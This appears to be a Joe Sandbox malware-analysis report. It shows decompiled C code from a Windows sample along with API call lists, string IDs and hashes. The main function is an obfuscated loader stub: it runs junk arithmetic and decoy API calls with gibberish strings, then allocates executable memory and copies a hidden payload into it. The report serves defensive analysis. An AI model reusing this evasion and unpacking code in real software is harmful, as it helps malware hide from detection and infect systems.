						_v1896 = 0x6cf29885;
						_v1920 = 0x75da6ba3;
						_v1752 = 0x4fb2c937;
						_v1676 = 0x2a09940f;
						_v1892 = 0x66a62aae;
						_v1740 = 0x2a8f2010;
						_v1804 = 0x334de827;
						_v1836 = 0x29b5f4b4;
						_v1844 = 0x3f6a5c30;
						_v1748 = 0x1f3d6e02;
						_v1832 = 0x794b22cc;
						_v1900 = 0x3e568168;
						_v1852 = 0x1dee1606;
						_v1684 = 0x2c7fea58;
						_v1768 = 0x6b81bbed;
						_v1720 = 0x64a41f37;
						_v1736 = 0x35729f65;
						_v1908 = 0x5aadb3a8;
						_v1756 = 0x6ea7f473;
						_v1872 = 0x6921ddf8;
						_v1860 = 0x769c5e44;
						_v1728 = 0x656fed79;
						_v1916 = 0x1378c832;
						_v1808 = 0x5d5bd4c;
						_v1856 = 0x75fd95ac;
						_v1776 = 0x1cc6260a;
						_v1692 = 0x3f40d0c;
						_v1936 = 0x7adaa56b;
						_v1648 = 0x57b008b4;
						_v1868 = 0x2700123d;
						_v1764 = 0x6dbcd40c;
						_v1772 = 0x5a90c04a;
						_v1904 = 0x3953d19f;
						_v1652 = 0x64e5d37a;
						_v1840 = 0x7ce1380e;
						_v1624 = 0x524dcf5b;
						_v1784 = 0x5951f7eb;
						_v1696 = 0x6955fa03;
						_v1656 = 0x500c476a;
						_v1628 = 0x4b3e0419;
						_v1680 = 0x1db8b113;
						_v1792 = 0x24eb64e4;
						_v1744 = 0x328a92be;
						_v1812 = 0x6a062f7d;
						_v1888 = 0x3ea350c2;
						_v1672 = 0x4bb851a;
						_v1816 = 0x4b8d9459;
						_v1620 = 0x38e35efd;
						_v1712 = _v1712 - 0x558fe6a4;
						_v1712 = _v1712 + 0x50ad1fda;
						_v1712 = _v1712 - 0x14676606;
						_v1712 = _v1712 - 0xde9941e;
						_v1664 = _v1664 + 0x530252b3;
						_v1912 = _v1912 - 0x5712fe58;
						_v1912 = _v1912 - 0x67656cad;
						_v1664 = _v1664 - 0x27701414;
						_v1700 = _v1700 - 0x2d7fdc66;
						_v1664 = _v1664 + 0xd927fd0;
						_v1824 = _v1824 + 0x1d62bd47;
						_v1712 = _v1712 - 0x413beb88;
						_v1820 = _v1820 + 0x4b1ba98c;
						_v1636 = _v1636 + 0x5714e824;
						_v1824 = _v1824 + 0x5991b917;
						_v1636 = _v1636 + 0xe416917;
						_v1848 = _v1848 + 0x7989dc34;
						_v1876 = _v1876 - 0x23cfc6eb;
						_v1848 = _v1848 + 0x2801ab16;
						_v1664 = _v1664 + 0x7484b53a;
						_v1636 = _v1636 + 0x749e9c07;
						_v1788 = _v1788 - 0x5457031;
						_v1700 = _v1700 + 0x7cef0def;
						_v1664 = _v1664 + 0x602337d4;
						_v1824 = _v1824 - 0x4db5aaa7;
						_v1712 = _v1712 - 0xd15d48d;
						_v1912 = _v1912 + 0x1195b0f0;
						_v1640 = _v1640 + 0x162f2481;
						_v1716 = _v1716 - 0x65b9b22d;
						_v1788 = _v1788 - 0x7301efd9;
						_v1632 = _v1632 + 0x27c78c9c;
						_v1924 = _v1924 - 0x59972a51;
						_v1884 = _v1884 - 0x19eb66c5;
						_v1732 = _v1732 + 0x4e89d140;
						_v1636 = _v1636 + 0x2e2119d1;
						_v1884 = _v1884 - 0x4e734c7a;
						_v1688 = _v1688 - 0x59bb6af3;
						_v1632 = _v1632 - 0x70f4c2b3;
						_v1660 = _v1660 + 0x2edb0761;
						_v1668 = _v1668 - 0x1923a94e;
						_v1824 = _v1824 - 0x2ef58b8a;
						_v1864 = _v1864 + 0x33dad1d;
						_v1636 = _v1636 + 0x5423c49b;
						_v1800 = _v1800 - 0x48abee08;
						_v1716 = _v1716 + 0x3d4e7d87;
						_v1848 = _v1848 + 0x26809a7f;
						_v1708 = _v1708 - 0x4b246d69;
						_v1668 = _v1668 + 0x20474bcf;
						_v1796 = _v1796 - 0x21c628b;
						_v1920 = _v1920 - 0x17c8788f;
						_v1676 = _v1676 + 0x16bd0599;
						_v1804 = _v1804 - 0x15f7270a;
						_v1708 = _v1708 - 0x21060fcb;
						_v1688 = _v1688 + 0xebdaa01;
						_v1848 = _v1848 + 0x1b52ee57;
						_v1796 = _v1796 + 0x5b2af0c1;
						_v1732 = _v1732 - 0x4db5b8c3;
						_v1752 = _v1752 + 0x6510af93;
						_v1736 = _v1736 + 0x52e0ddbf;
						_v1820 = _v1820 - 0x2bd2897c;
						_v1912 = _v1912 - 0x13112fb5;
						_v1676 = _v1676 + 0x6a13f381;
						_v1708 = _v1708 - 0x54dc36e9;
						_v1924 = _v1924 + 0x65426798;
						_v1896 = _v1896 - 0x690c2f07;
						_v1712 = _v1712 + 0x6ad6249;
						_v1768 = _v1768 + 0x5bec5851;
						_v1752 = _v1752 - 0x2acb6a31;
						_v1844 = _v1844 - 0x3d050de4;
						_v1716 = _v1716 - 0x3e2bbe5b;
						_v1912 = _v1912 + 0x37e10dd2;
						_v1720 = _v1720 + 0x660439a6;
						_v1836 = _v1836 + 0x43dcb1d8;
						_v1904 = _v1904 + 0x55a9d8d1;
						_v1768 = _v1768 + 0x3591dc23;
						_v1712 = _v1712 - 0x6ee3267;
						_v1864 = _v1864 + 0x191d88a6;
						_v1700 = _v1700 + 0x306bac8f;
					}
					 *_t764(0, 0, 0, 0, 0); // executed
					GetSystemDefaultLCID();
					if(_t834 > 0x11bb645) {
						break;
					}
					_t834 =  &(_t834->nLength);
					if(_t834 < 0x16f1a994) {
						continue;
					}
					break;
				}
				_t770 =  *0x47f7d4; // 0x5f7d0
				 *0x480144 =  *0x41dd4c;
				_t579 = GlobalAlloc(0, _t770);
				_t771 =  *0x47f7d4; // 0x5f7d0
				_t780 =  &_v1952;
				 *0x47f73c = _t579;
				VirtualProtect(_t579, _t771, 0x40,  &_v1952);
				_t853 =  *0x47f7d4 - 0x16;
				if( *0x47f7d4 == 0x16) {
					GetVersion();
					_t780 =  &_v1948;
					WriteConsoleW(0, 0, 0,  &_v1948, 0);
					GetLastError();
					HeapFree(0, 0, 0);
					SetConsoleCursorInfo(0, 0);
					FindNextFileA(0,  &_v1432);
					_v1612.Bias = 7;
					_v1616 = 0;
					_v1632 = 0;
					_v28 = 0;
					E00406BF3(0, 0);
					_push(0);
					E0040721E(_t764,  &_v1948, 0, _t834, _t853);
					asm("fldz");
					_t845 = _t842 + 4;
					asm("fst qword [esp+0x8]");
					 *_t845 = _t869;
					E00406730();
					_t846 = _t845 + 8;
					st0 = _t869;
					_t624 = _t846;
					 *_t624 = 0;
					 *((intOrPtr*)(_t624 + 4)) = 0;
					E00407300( &_v1948, 0);
					st0 = _t869;
					_t626 = _t846;
					 *_t626 = 0;
					 *((intOrPtr*)(_t626 + 4)) = 0;
					E00406870();
					st0 = _t869;
					_t628 = _t846;
					 *_t628 = 0;
					 *((intOrPtr*)(_t628 + 4)) = 0;
					E00406D40();
					st0 = _t869;
					E00407035(_t764, _t780, 0, _t834, _t853);
					_t847 = _t846 + 4;
					_t631 = _t847;
					 *_t631 = 0;
					 *((intOrPtr*)(_t631 + 4)) = 0;
					E00406E70(0, 0);
					st0 = _t869;
					_t842 = _t847 + 8;
					_v28 = 0xffffffff;
					if(_v1612.Bias >= 8) {
						_t780 = _v1632;
						E00406D26(_v1632);
						_t842 = _t842 + 4;
					}
				}
				_t772 =  *0x47f7d4; // 0x5f7d0
				_t855 = _t772 - 0xc;
				if(_t772 == 0xc) {
					FoldStringA(0, "cadavafofufeniyi", 0,  &_v1112, 0);
					E00406744(0);
					E0040698D(0, 0);
					_t609 = _t842 + 4;
					 *_t609 = 0;
					 *((intOrPtr*)(_t609 + 4)) = 0;
					E00406E70();
					st0 = _t869;
					_push(0);
					_push(0);
					E00406C0A(_t764, _t780, 0, _t834, _t855);
					E0040701F(0);
					E00406F8A();
				}
				_t835 = 0;
				if(_t772 <= 0) {
					L15:
					_t581 = 0;
					_v1956 = 0;
					L17:
					L17:
					if(_t772 + _t581 == 0x5e) {
						ConvertFiberToThread();
						SetFileAttributesW(L"zusunabigiv", 0);
						AddAtomA("cefiw");
						__imp__SetFileShortNameW(0, 0);
						_t581 = _v1964;
					}
					_t581 = _t581 + 1;
					_v1956 = _t581;
					if(_t581 < 0x40c893) {
						goto L16;
					}
					E00405800();
					_t774 = 0;
					do {
						if(_t774 == 0x770e) {
							E00405960(_t774);
						}
						_t774 = _t774 + 1;
					} while (_t774 < 0x286b97d);
					_v1956 = 0x7b;
					do {
						if( *0x47f7d4 == 0xd) {
							GetFileAttributesExW(L"tavehidinavonerumotevevigirihezikedevavebuhilo", 0,  &_v1112);
							GetFileType(0);
							LocalAlloc(0, 0);
							WritePrivateProfileStringA(0, 0, 0, 0);
							DeregisterEventSource(0);
						}
						if( *0x47f7d4 == 0xf) {
							__imp__GetConsoleAliasA(0,  &_v1112, 0, 0);
						}
						_t566 =  &_v1956;
						 *_t566 = _v1956 - 1;
					} while ( *_t566 != 0);
					_v1956 = 0x184cc;
					do {
						if( *0x47f7d4 == 0x1833b) {
							FindFirstChangeNotificationA("Bemolufekagegok", 0, 0);
							GetFileAttributesA(0);
							SetComputerNameA("witupadivelisitolihesemawakeloy");
							__imp__SetThreadExecutionState(0);
							TlsGetValue(0);
							SetTimeZoneInformation( &_v1612);
							GetFileAttributesW(L"heweyidocemuvikezalagecu");
							__imp__SetFileShortNameA(0, "Ziyezetuninanur tepar kekoxirolapugey");
						}
						_t570 =  &_v1956;
						 *_t570 = _v1956 - 1;
					} while ( *_t570 != 0);
					_t596 = LoadLibraryA("msimg32.dll");
					 *[fs:0x0] = _v36;
					return _t596;
					L16:
					_t772 =  *0x47f7d4; // 0x5f7d0
					goto L17;
				} else {
					do {
						_v1956 =  *0x480144;
						_v1956 = _v1956 + 0xb2d3b;
						_t778 =  *0x47f73c; // 0x0
						 *((char*)(_t835 + _t778)) =  *((intOrPtr*)(_v1956 + _t835));
						if( *0x47f7d4 == 0x44) {
							LocalAlloc(0, 0);
							GetBinaryTypeW(0,  &_v1948);
							CreateMutexA(0, 0, 0);
						}
						_t772 =  *0x47f7d4; // 0x5f7d0
						_t835 = _t835 + 1;
					} while (_t835 < _t772);
					goto L15;
				}
			}























































































































                    0x004059a0
                    0x004059a3
                    0x004059ac
                    0x004059ae
                    0x004059b3
                    0x004059b4
                    0x004059bb
                    0x004059c4
                    0x004059c9
                    0x004059d1
                    0x004059d3
                    0x004059d3
                    0x004059df
                    0x004059e5
                    0x004059f0
                    0x004059f8
                    0x00405a03
                    0x00405a0e
                    0x00405a19
                    0x00405a24
                    0x00405a2f
                    0x00405a3a
                    0x00405a45
                    0x00405a50
                    0x00405a58
                    0x00405a63
                    0x00405a6e
                    0x00405a79
                    0x00405a81
                    0x00405a8c
                    0x00405a97
                    0x00405aa2
                    0x00405aaa
                    0x00405ab5
                    0x00405ac0
                    0x00405acb
                    0x00405ad6
                    0x00405ade
                    0x00405ae9
                    0x00405af1
                    0x00405af9
                    0x00405b04
                    0x00405b0f
                    0x00405b1a
                    0x00405b25
                    0x00405b2d
                    0x00405b35
                    0x00405b40
                    0x00405b4b
                    0x00405b53
                    0x00405b5e
                    0x00405b69
                    0x00405b74
                    0x00405b7f
                    0x00405b8a
                    0x00405b95
                    0x00405b9d
                    0x00405ba8
                    0x00405bb3
                    0x00405bbe
                    0x00405bc9
                    0x00405bd4
                    0x00405bdc
                    0x00405be7
                    0x00405bef
                    0x00405bfa
                    0x00405c05
                    0x00405c0d
                    0x00405c18
                    0x00405c23
                    0x00405c2e
                    0x00405c39
                    0x00405c41
                    0x00405c4c
                    0x00405c54
                    0x00405c5f
                    0x00405c6a
                    0x00405c72
                    0x00405c7d
                    0x00405c88
                    0x00405c93
                    0x00405c9e
                    0x00405ca9
                    0x00405cb4
                    0x00405cbf
                    0x00405cca
                    0x00405cd5
                    0x00405ce0
                    0x00405ceb
                    0x00405cf3
                    0x00405cfe
                    0x00405d09
                    0x00405d14
                    0x00405d45
                    0x00405d50
                    0x00405d6e
                    0x00405dac
                    0x00405db7
                    0x00405dbf
                    0x00405dc7
                    0x00405dd2
                    0x00405ddd
                    0x00405de8
                    0x00405df3
                    0x00405dfe
                    0x00405e1c
                    0x00405e27
                    0x00405e32
                    0x00405e3d
                    0x00405e5b
                    0x00405e63
                    0x00405e6e
                    0x00405e79
                    0x00405e84
                    0x00405e8f
                    0x00405ec0
                    0x00405ecb
                    0x00405ee9
                    0x00405f07
                    0x00405f0f
                    0x00405f2d
                    0x00405f58
                    0x00405f63
                    0x00405f81
                    0x00405f9c
                    0x00405fb7
                    0x00405fc2
                    0x00405fe0
                    0x00405fe8
                    0x00405ff3
                    0x00405ffe
                    0x00406009
                    0x00406027
                    0x00406032
                    0x0040603a
                    0x00406045
                    0x00406050
                    0x0040605b
                    0x00406066
                    0x00406071
                    0x0040607c
                    0x004060ad
                    0x004060b5
                    0x004060d3
                    0x004060de
                    0x004060e9
                    0x004060f4
                    0x004060ff
                    0x0040611d
                    0x0040614e
                    0x00406159
                    0x00406197
                    0x004061a2
                    0x004061c4
                    0x004061e2
                    0x004061ed
                    0x00406208
                    0x00406210
                    0x0040622e
                    0x00406239
                    0x00406244
                    0x0040625c
                    0x0040627a
                    0x0040628f
                    0x004062a7
                    0x004062b2
                    0x004062ba
                    0x004062c5
                    0x004062d0
                    0x00406324
                    0x0040633b
                    0x00406347
                    0x00406349
                    0x00406355
                    0x00000000
                    0x00000000
                    0x00406357
                    0x0040635e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040635e
                    0x00406364
                    0x00406371
                    0x00406376
                    0x0040637c
                    0x00406382
                    0x0040638b
                    0x00406390
                    0x00406396
                    0x0040639d
                    0x004063a3
                    0x004063aa
                    0x004063b2
                    0x004063b8
                    0x004063c1
                    0x004063c9
                    0x004063d8
                    0x004063e0
                    0x004063eb
                    0x004063f2
                    0x004063fc
                    0x00406403
                    0x00406408
                    0x0040640b
                    0x00406410
                    0x00406412
                    0x00406415
                    0x00406419
                    0x0040641c
                    0x00406421
                    0x00406424
                    0x00406426
                    0x00406428
                    0x0040642a
                    0x0040642d
                    0x00406432
                    0x00406434
                    0x00406436
                    0x00406438
                    0x0040643b
                    0x00406440
                    0x00406442
                    0x00406444
                    0x00406446
                    0x00406449
                    0x0040644e
                    0x00406451
                    0x00406456
                    0x00406459
                    0x0040645b
                    0x0040645d
                    0x00406460
                    0x00406465
                    0x00406467
                    0x0040646a
                    0x0040647d
                    0x0040647f
                    0x00406487
                    0x0040648c
                    0x0040648c
                    0x0040647d
                    0x0040648f
                    0x00406495
                    0x00406498
                    0x004064aa
                    0x004064b1
                    0x004064bb
                    0x004064c0
                    0x004064c2
                    0x004064c4
                    0x004064c7
                    0x004064cc
                    0x004064ce
                    0x004064cf
                    0x004064d0
                    0x004064d6
                    0x004064de
                    0x004064de
                    0x004064e3
                    0x004064e7
                    0x00406540
                    0x00406552
                    0x00406554
                    0x00000000
                    0x00406566
                    0x0040656b
                    0x0040656d
                    0x00406576
                    0x0040657d
                    0x00406583
                    0x00406589
                    0x00406589
                    0x0040658d
                    0x00406593
                    0x00406597
                    0x00000000
                    0x00000000
                    0x00406599
                    0x0040659e
                    0x004065a0
                    0x004065a6
                    0x004065a8
                    0x004065a8
                    0x004065ad
                    0x004065ae
                    0x004065c8
                    0x004065d0
                    0x004065d7
                    0x004065e8
                    0x004065ec
                    0x004065f2
                    0x00406600
                    0x00406604
                    0x00406604
                    0x00406611
                    0x00406621
                    0x00406621
                    0x00406627
                    0x00406627
                    0x00406627
                    0x00406640
                    0x00406650
                    0x0040665a
                    0x00406665
                    0x00406669
                    0x00406670
                    0x00406674
                    0x0040667c
                    0x0040668a
                    0x00406695
                    0x004066a2
                    0x004066a2
                    0x004066a8
                    0x004066a8
                    0x004066a8
                    0x004066b4
                    0x004066c3
                    0x004066ce
                    0x00406560
                    0x00406560
                    0x00000000
                    0x004064e9
                    0x004064f0
                    0x004064f6
                    0x004064ff
                    0x0040650a
                    0x00406510
                    0x0040651a
                    0x0040651e
                    0x0040652a
                    0x0040652f
                    0x0040652f
                    0x00406535
                    0x0040653b
                    0x0040653c
                    0x00000000
                    0x004064f0

                    APIs
                    • GetLastError.KERNEL32 ref: 004059D3
                    • GetGeoInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00406347
                    • GetSystemDefaultLCID.KERNEL32 ref: 00406349
                    • GlobalAlloc.KERNEL32(00000000,0005F7D0), ref: 00406376
                    • VirtualProtect.KERNEL32(00000000,0005F7D0,00000040,?), ref: 00406390
                    • GetVersion.KERNEL32 ref: 004063A3
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004063B2
                    • GetLastError.KERNEL32 ref: 004063B8
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004063C1
                    • SetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 004063C9
                    • FindNextFileA.KERNEL32(00000000,?), ref: 004063D8
                    • _fseek.LIBCMT ref: 0040640B
                    • __floor_pentium4.LIBCMT ref: 0040643B
                    • __floor_pentium4.LIBCMT ref: 00406449
                    • _puts.LIBCMT ref: 00406451
                    • FoldStringA.KERNEL32(00000000,cadavafofufeniyi,00000000,?,00000000), ref: 004064AA
                    • _feof.LIBCMT ref: 004064B1
                    • _fsetpos.LIBCMT ref: 004064BB
                    • _fprintf.LIBCMT ref: 004064D0
                      • Part of subcall function 0040701F: __wcstoi64.LIBCMT ref: 0040702B
                      • Part of subcall function 00406F8A: __getptd.LIBCMT ref: 00406F96
                      • Part of subcall function 00406F8A: _abort.LIBCMT ref: 00406FB8
                    • LocalAlloc.KERNEL32(00000000,00000000), ref: 0040651E
                    • GetBinaryTypeW.KERNEL32(00000000,?), ref: 0040652A
                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0040652F
                    • ConvertFiberToThread.KERNEL32 ref: 0040656D
                    • SetFileAttributesW.KERNEL32(zusunabigiv,00000000), ref: 00406576
                    • AddAtomA.KERNEL32 ref: 0040657D
                    • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 00406583
                    • GetFileAttributesExW.KERNEL32(tavehidinavonerumotevevigirihezikedevavebuhilo,00000000,?), ref: 004065E8
                    • GetFileType.KERNEL32(00000000), ref: 004065EC
                    • LocalAlloc.KERNEL32(00000000,00000000), ref: 004065F2
                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00406600
                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00406604
                    • GetConsoleAliasA.KERNEL32(00000000,?,00000000,00000000), ref: 00406621
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: File$AllocConsole$AttributesErrorInfoLastLocalStringTypeWrite__floor_pentium4$AliasAtomBinaryConvertCreateCursorDefaultDeregisterEventFiberFindFoldFreeGlobalHeapMutexNameNextPrivateProfileProtectShortSourceSystemThreadVersionVirtual__getptd__wcstoi64_abort_feof_fprintf_fseek_fsetpos_puts
                    • String ID: !pbN$&#p,$'M3$0\j?$Bemolufekagegok$QX[$Sn&$V!tc$ZCBe$Ziyezetuninanur tepar kekoxirolapugey$`f[!$cadavafofufeniyi$cefiw$heweyidocemuvikezalagecu$im$K$msimg32.dll$tavehidinavonerumotevevigirihezikedevavebuhilo$witupadivelisitolihesemawakeloy$w3$yoe$zLsN$zusunabigiv${$|$d$$xd7
                    • API String ID: 1543215214-1725507697
                    • Opcode ID: 31b892f1b1e2f5dbd9b73dc91cab596856a1f5243eff4b599b9f42058fe2f840
                    • Instruction ID: 5dc258c7044e7f3c7e2f74ce0e13a03e81a2acf7cec3cc4318438fad21ef302c
                    • Opcode Fuzzy Hash: 31b892f1b1e2f5dbd9b73dc91cab596856a1f5243eff4b599b9f42058fe2f840
                    • Instruction Fuzzy Hash: DF5221B5608380DFC2748F56D98AB9FB7F4FB85704F40882DE68A5A660C7749884CF5B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040CE1F Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 69 40ce1f-40ce41 HeapCreate 70 40ce43-40ce44 69->70 71 40ce45-40ce4e 69->71
                    C-Code - Quality: 100%
                    			E0040CE1F(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x47ef44 = _t6;
				if(_t6 != 0) {
					 *0x480164 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                    0x0040ce34
                    0x0040ce3a
                    0x0040ce41
                    0x0040ce48
                    0x0040ce4e
                    0x0040ce44
                    0x0040ce44
                    0x0040ce44

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040CE34
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: a4a0a6336ea97a9031573e920964d2cb6ee1247d9aef2f4727136763679d05ab
                    • Instruction ID: b83782b3064b2fa160c0ab102a9f44b4b2381b4b853f59d27647a978661f5c34
                    • Opcode Fuzzy Hash: a4a0a6336ea97a9031573e920964d2cb6ee1247d9aef2f4727136763679d05ab
                    • Instruction Fuzzy Hash: B3D0A732550304AFDB109F75BD087273BDCD3883A5F044476F90CD61A0F675C980C648
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040899C Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 72 40899c-40899e call 40892a 74 4089a3-4089a4 72->74
                    C-Code - Quality: 100%
                    			E0040899C() {
				void* _t1;

				_t1 = E0040892A(0); // executed
				return _t1;
			}




                    0x0040899e
                    0x004089a4

                    APIs
                    • __encode_pointer.LIBCMT ref: 0040899E
                      • Part of subcall function 0040892A: TlsGetValue.KERNEL32(00000000,?,004089A3,00000000,004135CD,0047EB20,00000000,00000314,?,0040C734,0047EB20,Microsoft Visual C++ Runtime Library,00012010), ref: 0040893C
                      • Part of subcall function 0040892A: TlsGetValue.KERNEL32(00000002,?,004089A3,00000000,004135CD,0047EB20,00000000,00000314,?,0040C734,0047EB20,Microsoft Visual C++ Runtime Library,00012010), ref: 00408953
                      • Part of subcall function 0040892A: RtlEncodePointer.NTDLL(00000000,?,004089A3,00000000,004135CD,0047EB20,00000000,00000314,?,0040C734,0047EB20,Microsoft Visual C++ Runtime Library,00012010), ref: 00408991
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: Value$EncodePointer__encode_pointer
                    • String ID:
                    • API String ID: 2585649348-0
                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                    • Instruction ID: 02e34f1245a565ddb697b8bc2cd3855ae91f2fcba4abb84b0cf70a8bb5c8c627
                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00407AAB Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E00407AAB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x41a224; // 0xbfb39b89
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x47f050 = _t6;
				 *0x47f04c = _t22;
				 *0x47f048 = _t25;
				 *0x47f044 = _t21;
				 *0x47f040 = _t27;
				 *0x47f03c = _t26;
				 *0x47f068 = ss;
				 *0x47f05c = cs;
				 *0x47f038 = ds;
				 *0x47f034 = es;
				 *0x47f030 = fs;
				 *0x47f02c = gs;
				asm("pushfd");
				_pop( *0x47f060);
				 *0x47f054 =  *_t31;
				 *0x47f058 = _v0;
				 *0x47f064 =  &_a4;
				 *0x47efa0 = 0x10001;
				_t11 =  *0x47f058; // 0x0
				 *0x47ef54 = _t11;
				 *0x47ef48 = 0xc0000409;
				 *0x47ef4c = 1;
				_t12 =  *0x41a224; // 0xbfb39b89
				_v812 = _t12;
				_t13 =  *0x41a228; // 0x404c6476
				_v808 = _t13;
				 *0x47ef98 = IsDebuggerPresent();
				_push(1);
				E004088A3(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("H\xef\xbf				if( *0x47ef98 == 0) {
					_push(1);
					E004088A3(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                    0x00407aab
                    0x00407aab
                    0x00407aab
                    0x00407aab
                    0x00407aab
                    0x00407aab
                    0x00407aab
                    0x00407ab1
                    0x00407ab3
                    0x00407ab3
                    0x0040dbf7
                    0x0040dbfc
                    0x0040dc02
                    0x0040dc08
                    0x0040dc0e
                    0x0040dc14
                    0x0040dc1a
                    0x0040dc21
                    0x0040dc28
                    0x0040dc2f
                    0x0040dc36
                    0x0040dc3d
                    0x0040dc44
                    0x0040dc45
                    0x0040dc4e
                    0x0040dc56
                    0x0040dc5e
                    0x0040dc69
                    0x0040dc73
                    0x0040dc78
                    0x0040dc7d
                    0x0040dc87
                    0x0040dc91
                    0x0040dc96
                    0x0040dc9c
                    0x0040dca1
                    0x0040dcad
                    0x0040dcb2
                    0x0040dcb4
                    0x0040dcbc
                    0x0040dcc7
                    0x0040dcd4
                    0x0040dcd6
                    0x0040dcd8
                    0x0040dcdd
                    0x0040dcf1

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0040DCA7
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040DCBC
                    • UnhandledExceptionFilter.KERNEL32(HG), ref: 0040DCC7
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0040DCE3
                    • TerminateProcess.KERNEL32(00000000), ref: 0040DCEA
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID: HG$vdL@
                    • API String ID: 2579439406-3365594438
                    • Opcode ID: c968fc26dad764d8bb3b27da463ee2b1ac94b68773e3d7493b1255c70e2866d0
